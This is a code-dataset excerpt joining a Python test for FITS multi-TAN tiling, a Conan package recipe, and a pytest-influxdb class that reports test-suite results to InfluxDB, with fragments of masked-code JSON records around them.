rmtree(self.work_dir)\n\n def work_path(self, *pieces):\n return os.path.join(self.work_dir, *pieces)\n\n def test_basic(self):\n coll = collection.SimpleFitsCollection([test_path(\"wcs512.fits.gz\")])\n\n proc = multi_tan.MultiTanProcessor(coll)\n\n from ..pyramid import PyramidIO\n\n pio = PyramidIO(self.work_path(\"basic\"), default_format=\"fits\")\n\n builder = Builder(pio)\n\n proc.compute_global_pixelization(builder)\n proc.tile(pio)\n\n BARY_SLICES = [\n (slice(0, 128), slice(0, 128)),\n (slice(0, 128), slice(128, None)),\n (slice(128, None), slice(0, 128)),\n (slice(128, None), slice(128, None)),\n ]\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. 
The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n\n if not HAS_ASTRO:\n return\n\n with fits.open(path) as hdul:\n data = hdul[0].data\n\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n\n WCS512_BARYDATA = [\n (63.44949378800272, 64.40535387506924),\n (63.24744175084746, 63.67473452789256),\n (65.22950207855361, 63.35629429568745),\n (62.027396724898814, 62.815937534782144),\n ]\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(\n self.WTML.replace('Thumbnail=\"thumb.jpg\"', \"\").replace(\n \"<ThumbnailUrl>thumb.jpg</ThumbnailUrl>\",\n \"<ThumbnailUrl></ThumbnailUrl>\",\n )\n )\n\n args = [\n \"tile-multi-tan\",\n \"--hdu-index\",\n \"0\",\n \"--outdir\",\n self.work_path(\"basic_cli\"),\n test_path(\"wcs512.fits.gz\"),\n ]\n cli.entrypoint(args)\n\n with open(\n self.work_path(\"basic_cli\", \"index_rel.wtml\"), \"rt\", encoding=\"utf8\"\n ) as f:\n observed = etree.fromstring(f.read())\n\n assert_xml_elements_equal(observed, expected)\n\n args = [\n \"cascade\",\n \"--start\",\n \"1\",\n self.work_path(\"basic_cli\"),\n ]\n cli.entrypoint(args)\n\n self.maybe_test_barycenter(\n self.work_path(\"basic_cli\", \"0\", \"0\", \"0_0.fits\"), self.WCS512_BARYDATA\n )\n\n def test_study_cli(self):\n \"\"\"\n Test tile-study on FITS. This should properly go in test_study.py, but\n this file is the one that has the reference WTML information.\n \"\"\"\n expected = etree.fromstring(self.WTML)\n\n args = [\n \"tile-study\",\n \"--placeholder-thumbnail\",\n \"--outdir\",\n self.work_path(\"study_cli\"),\n test_path(\"wcs512.fits.gz\"),\n ]\n cli.entrypoint(args)\n\n with open(\n self.work_path(\"study_cli\", \"index_rel.wtml\"), \"rt\", encoding=\"utf8\"\n ) as f:\n observed = etree.fromstring(f.read())\n\n assert_xml_elements_equal(observed, expected)\n\n args = [\n \"cascade\",\n \"--start\",\n \"1\",\n self.work_path(\"study_cli\"),\n ]\n cli.entrypoint(args)\n\n self.maybe_test_barycenter(\n self.work_path(\"study_cli\", \"0\", \"0\", \"0_0.fits\"), self.WCS512_BARYDATA\n )\n\n @pytest.mark.skipif(\"not HAS_REPROJECT\")\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. 
import builder, collection, multi_wcs, pyramid\n\n reproject_function = reproject.reproject_interp\n outdir = self.work_path(\"as_multi_wcs\")\n\n pio = pyramid.PyramidIO(outdir, default_format=\"fits\")\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection(\n [test_path(\"wcs512.fits.gz\")], hdu_index=0\n )\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n\n args = [\n \"cascade\",\n \"--start\",\n \"1\",\n self.work_path(\"as_multi_wcs\"),\n ]\n cli.entrypoint(args)\n\n self.maybe_test_barycenter(\n self.work_path(\"as_multi_wcs\", \"0\", \"0\", \"0_0.fits\"), self.WCS512_BARYDATA\n )\n",
"step-ids": [
5,
6,
9,
10,
13
]
}
|
[
5,
6,
9,
10,
13
] |
from conans import ConanFile, CMake, tools
import os
class Demo(ConanFile):
name = "Demo"
version = "0.1"
license = "<Put the package license here>"
url = "<Package recipe repository url here, for issues about the package>"
description = "<Description of Testlib here>"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False]}
default_options = "shared=False"
generators = "cmake"
exports_sources = "src/*"
requires = "TestLib/0.1@gbmhunter/testing"
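    # Configure the CMake project under src/ and build it against the TestLib dependency.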
def build(self):
cmake = CMake(self)
cmake.configure(source_folder="src/")
        print('TestLib cpp_info: ' + str(self.deps_cpp_info["TestLib"]))
cmake.build()
def imports(self):
self.copy("*.dll", dst="bin", src="bin")
self.copy("*.dylib*", dst="bin", src="lib")
self.copy('*.so*', dst='bin', src='lib')
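    # Smoke test: run the built example binary unless cross-building.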
def test(self):
if not tools.cross_building(self.settings):
os.chdir("bin")
self.run(".%sexample" % os.sep)
def package(self):
self.copy("*.h", dst="include", src="src")
self.copy("*.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.dylib*", dst="lib", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
|
normal
|
{
"blob_id": "c9bc331f4805a956146619c59d183fc3bcbe47cb",
"index": 9728,
"step-1": "<mask token>\n\n\nclass Demo(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def imports(self):\n self.copy('*.dll', dst='bin', src='bin')\n self.copy('*.dylib*', dst='bin', src='lib')\n self.copy('*.so*', dst='bin', src='lib')\n <mask token>\n\n def package(self):\n self.copy('*.h', dst='include', src='src')\n self.copy('*.lib', dst='lib', keep_path=False)\n self.copy('*.dll', dst='bin', keep_path=False)\n self.copy('*.dylib*', dst='lib', keep_path=False)\n self.copy('*.so', dst='lib', keep_path=False)\n self.copy('*.a', dst='lib', keep_path=False)\n",
"step-2": "<mask token>\n\n\nclass Demo(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def imports(self):\n self.copy('*.dll', dst='bin', src='bin')\n self.copy('*.dylib*', dst='bin', src='lib')\n self.copy('*.so*', dst='bin', src='lib')\n\n def test(self):\n if not tools.cross_building(self.settings):\n os.chdir('bin')\n self.run('.%sexample' % os.sep)\n\n def package(self):\n self.copy('*.h', dst='include', src='src')\n self.copy('*.lib', dst='lib', keep_path=False)\n self.copy('*.dll', dst='bin', keep_path=False)\n self.copy('*.dylib*', dst='lib', keep_path=False)\n self.copy('*.so', dst='lib', keep_path=False)\n self.copy('*.a', dst='lib', keep_path=False)\n",
"step-3": "<mask token>\n\n\nclass Demo(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def build(self):\n cmake = CMake(self)\n cmake.configure(source_folder='src/')\n print('BLAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = ' + str(self.\n deps_cpp_info['TestLib']))\n cmake.build()\n\n def imports(self):\n self.copy('*.dll', dst='bin', src='bin')\n self.copy('*.dylib*', dst='bin', src='lib')\n self.copy('*.so*', dst='bin', src='lib')\n\n def test(self):\n if not tools.cross_building(self.settings):\n os.chdir('bin')\n self.run('.%sexample' % os.sep)\n\n def package(self):\n self.copy('*.h', dst='include', src='src')\n self.copy('*.lib', dst='lib', keep_path=False)\n self.copy('*.dll', dst='bin', keep_path=False)\n self.copy('*.dylib*', dst='lib', keep_path=False)\n self.copy('*.so', dst='lib', keep_path=False)\n self.copy('*.a', dst='lib', keep_path=False)\n",
"step-4": "<mask token>\n\n\nclass Demo(ConanFile):\n name = 'Demo'\n version = '0.1'\n license = '<Put the package license here>'\n url = '<Package recipe repository url here, for issues about the package>'\n description = '<Description of Testlib here>'\n settings = 'os', 'compiler', 'build_type', 'arch'\n options = {'shared': [True, False]}\n default_options = 'shared=False'\n generators = 'cmake'\n exports_sources = 'src/*'\n requires = 'TestLib/0.1@gbmhunter/testing'\n\n def build(self):\n cmake = CMake(self)\n cmake.configure(source_folder='src/')\n print('BLAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = ' + str(self.\n deps_cpp_info['TestLib']))\n cmake.build()\n\n def imports(self):\n self.copy('*.dll', dst='bin', src='bin')\n self.copy('*.dylib*', dst='bin', src='lib')\n self.copy('*.so*', dst='bin', src='lib')\n\n def test(self):\n if not tools.cross_building(self.settings):\n os.chdir('bin')\n self.run('.%sexample' % os.sep)\n\n def package(self):\n self.copy('*.h', dst='include', src='src')\n self.copy('*.lib', dst='lib', keep_path=False)\n self.copy('*.dll', dst='bin', keep_path=False)\n self.copy('*.dylib*', dst='lib', keep_path=False)\n self.copy('*.so', dst='lib', keep_path=False)\n self.copy('*.a', dst='lib', keep_path=False)\n",
"step-5": "from conans import ConanFile, CMake, tools\nimport os\n\nclass Demo(ConanFile):\n name = \"Demo\"\n version = \"0.1\"\n license = \"<Put the package license here>\"\n url = \"<Package recipe repository url here, for issues about the package>\"\n description = \"<Description of Testlib here>\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {\"shared\": [True, False]}\n default_options = \"shared=False\"\n generators = \"cmake\"\n exports_sources = \"src/*\"\n requires = \"TestLib/0.1@gbmhunter/testing\"\n\n def build(self):\n cmake = CMake(self) \n cmake.configure(source_folder=\"src/\")\n\n print('BLAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = ' + str(self.deps_cpp_info[\"TestLib\"]))\n cmake.build()\n\n def imports(self):\n self.copy(\"*.dll\", dst=\"bin\", src=\"bin\")\n self.copy(\"*.dylib*\", dst=\"bin\", src=\"lib\")\n self.copy('*.so*', dst='bin', src='lib')\n\n def test(self):\n if not tools.cross_building(self.settings):\n os.chdir(\"bin\")\n self.run(\".%sexample\" % os.sep)\n\n def package(self):\n self.copy(\"*.h\", dst=\"include\", src=\"src\")\n self.copy(\"*.lib\", dst=\"lib\", keep_path=False)\n self.copy(\"*.dll\", dst=\"bin\", keep_path=False)\n self.copy(\"*.dylib*\", dst=\"lib\", keep_path=False)\n self.copy(\"*.so\", dst=\"lib\", keep_path=False)\n self.copy(\"*.a\", dst=\"lib\", keep_path=False)",
"step-ids": [
3,
4,
5,
6,
8
]
}
|
[
3,
4,
5,
6,
8
] |
import json
import time
from pytest_influxdb.data_manager import DataManager
class SuiteResultDTO:
__run = 'UNDEFINED'
__project = 'UNDEFINED'
__version = 'UNDEFINED'
__passed = None
__failed = None
__skipped = None
__error = None
__duration_sec = 0
__disabled = 0
__retries = 0
__suite_result_dict = {'tags': {}, 'fields': {}}
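    # Class-level store for user-supplied custom tags/fields, merged into the json body in get_suite_json().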
def set_run(self, run):
if run != '':
self.__run = str(run)
def set_project(self, project):
if project != '':
self.__project = str(project)
def set_version(self, version):
if version != '':
self.__version = str(version)
def set_passed(self, passed):
self.__passed = int(passed)
def set_failed(self, failed):
self.__failed = int(failed)
def set_skipped(self, skipped):
self.__skipped = int(skipped)
def set_error(self, error):
self.__error = int(error)
def set_duration_sec(self, duration_sec):
self.__duration_sec = int(duration_sec)
def set_disabled(self, disabled):
self.__disabled = int(disabled)
def set_retries(self, retries):
self.__retries = int(retries)
def set_suite_result_dict(self, suite_result_dict):
SuiteResultDTO.__suite_result_dict = suite_result_dict
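    # Build the InfluxDB point for this suite run: standard tags/fields plus any custom ones.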
def get_suite_json(self, measurement_name):
json_body = [
{
"measurement": measurement_name,
"tags": {
"run": self.__run,
"project": self.__project,
"version": self.__version
},
"fields": {
"pass": self.__passed,
"fail": self.__failed,
"skip": self.__skipped,
"error": self.__error,
"disabled": self.__disabled,
"duration_sec": self.__duration_sec,
"retries": self.__retries
}
}
]
# Appending custom values to json_body
tags_dict = SuiteResultDTO.__suite_result_dict['tags']
for key in tags_dict:
suite_tags = json_body[0]['tags']
suite_tags.update({key: tags_dict[key]})
fields_dict = SuiteResultDTO.__suite_result_dict['fields']
for key in fields_dict:
suite_fields = json_body[0]['fields']
suite_fields.update({key: fields_dict[key]})
return json_body
def set_tag_values(self, tags_dict):
suite_tags = SuiteResultDTO.__suite_result_dict
suite_tags['tags'].update(tags_dict)
def set_field_values(self, fields_dict):
suite_fields = SuiteResultDTO.__suite_result_dict
suite_fields['fields'].update(fields_dict)
def set_suite_custom_values(self, influxdb_values):
if influxdb_values and influxdb_values != '':
if isinstance(influxdb_values, str):
influxdb_values = json.loads(influxdb_values)
self.set_field_values(influxdb_values['fields']['suite_result'])
self.set_tag_values(influxdb_values['tags']['suite_result'])
def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):
# Preparing execution time and suite results from the terminalreporter (where all the data collected)
execution_time = round(time.time() - terminalreporter._sessionstarttime)
suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)
# Setting the values to the suite_result_dto instance
self.set_passed(suite_results_dict.get('passed'))
self.set_failed(suite_results_dict.get('failed'))
self.set_skipped(suite_results_dict.get('skipped'))
self.set_error(suite_results_dict.get('error'))
self.set_disabled(suite_results_dict.get('disabled'))
self.set_duration_sec(execution_time)
self.set_retries(suite_results_dict.get('reruns'))
self.set_run(global_values.get("run"))
self.set_project(global_values.get("project"))
self.set_version(global_values.get("version"))
self.set_suite_custom_values(global_values.get("influxdb_values"))
self.merge_suite_result(global_values.get('merged'), influxdb_components,
db_measurement_name_for_suite, global_values.get("run"))
return self
def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):
# Merging the existing suite results with the suite_results from db for the same run
# if 'merged' config value is True
existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)
old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))
if len(old_suite_list) != 0 and merged_enabled:
old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][
'skip']
old_disabled_tests_count = old_suite_list[0]['disabled']
self.set_passed(
old_suite_total_count - self.__failed - self.__skipped)
self.set_disabled(old_disabled_tests_count)
influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)
|
normal
|
{
"blob_id": "84c3427a994bd6c57d9fa8449e4fc7a3de801170",
"index": 9271,
"step-1": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n <mask token>\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-2": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-3": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-4": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n\n def get_suite_json(self, measurement_name):\n json_body = [{'measurement': measurement_name, 'tags': {'run': self\n .__run, 'project': self.__project, 'version': self.__version},\n 'fields': {'pass': self.__passed, 'fail': self.__failed, 'skip':\n self.__skipped, 'error': self.__error, 'disabled': self.\n __disabled, 'duration_sec': self.__duration_sec, 'retries':\n self.__retries}}]\n tags_dict = SuiteResultDTO.__suite_result_dict['tags']\n for key in tags_dict:\n suite_tags = json_body[0]['tags']\n suite_tags.update({key: tags_dict[key]})\n fields_dict = SuiteResultDTO.__suite_result_dict['fields']\n for key in fields_dict:\n suite_fields = json_body[0]['fields']\n suite_fields.update({key: fields_dict[key]})\n return json_body\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = 
list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-5": "import json\nimport time\n\nfrom pytest_influxdb.data_manager import DataManager\n\n\nclass SuiteResultDTO:\n __run = 'UNDEFINED'\n __project = 'UNDEFINED'\n __version = 'UNDEFINED'\n __passed = None\n __failed = None\n __skipped = None\n __error = None\n __duration_sec = 0\n __disabled = 0\n __retries = 0\n __suite_result_dict = {'tags': {}, 'fields': {}}\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n\n def set_passed(self, passed):\n self.__passed = int(passed)\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n\n def set_retries(self, retries):\n self.__retries = int(retries)\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n\n def get_suite_json(self, measurement_name):\n json_body = [\n {\n \"measurement\": measurement_name,\n \"tags\": {\n \"run\": self.__run,\n \"project\": self.__project,\n \"version\": self.__version\n },\n \"fields\": {\n \"pass\": self.__passed,\n \"fail\": self.__failed,\n \"skip\": self.__skipped,\n \"error\": self.__error,\n \"disabled\": self.__disabled,\n \"duration_sec\": self.__duration_sec,\n \"retries\": self.__retries\n }\n }\n ]\n\n # Appending custom values to json_body\n tags_dict = SuiteResultDTO.__suite_result_dict['tags']\n for key in tags_dict:\n suite_tags = json_body[0]['tags']\n suite_tags.update({key: tags_dict[key]})\n fields_dict = SuiteResultDTO.__suite_result_dict['fields']\n for key in fields_dict:\n suite_fields = json_body[0]['fields']\n suite_fields.update({key: fields_dict[key]})\n\n return json_body\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):\n # Preparing execution time and suite results from the terminalreporter (where all the data collected)\n execution_time = round(time.time() - terminalreporter._sessionstarttime)\n suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)\n # Setting the values to the 